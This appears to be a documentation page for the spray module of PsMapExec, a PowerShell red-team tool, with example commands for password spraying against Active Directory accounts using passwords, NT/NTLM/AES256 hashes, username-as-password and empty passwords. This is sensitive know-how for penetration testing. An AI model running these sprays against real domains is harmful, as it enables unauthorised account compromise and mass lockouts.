The spray module provides different password spraying techniques. PsMapExec takes into account the default domain policy's account lockout threshold to prevent user account lockouts. However, it does not consider fine-grained password policies. It's advisable to assess whether such policies are in place within the environment to avoid potentially locking out a significant number of user accounts.



When using the Spray method -Targets parameter can be provided. Specifying "all" we spray all enabled user accounts in the domain. Otherwise, any other value will be treated as a group name. When -Targets is omitted, PsMapExec will spray all enabled active directory accounts.

PsMapExec -Method Spray                           # Sprays all
PsMapExec -Method Spray -Targets all              # Sprays all
PsMapExec -Method Spray -Targets "C:\Users.txt"   # Sprays users from list (SamAccountNames)
PsMapExec -Method Spray -Targets "AdminCount=1"   # Sprays targets with AdminCount=1
PsMapExec -Method Spray -Targets "Group Name"     # Sprays members of group


Hash authentication supports RC4/NT, NTLM and AES256 hashes

PsMapExec -Method Spray -SprayHash [RC4]
PsMapExec -Method Spray -SprayHash [AES256]
PsMapExec -Method Spray -SprayHash [NTLM]


PsMapExec -Method Spray -SprayPassword [Password]


Sets the password to the username value. This switch will also attempt to authenticate as computer accounts to identify any that might be current or legacy Pre-Windows 2000 Compatible Computers.

PsMapExec -Method Spray -AccountAsPassword


Authentication attempts are performed with empty password values.

PsMapExec -Method Spray -EmptyPassword


Displays only successful authentication attempts.

PsMapExec -Method Spray -SprayPassword Password123! -SuccessOnly

Last updated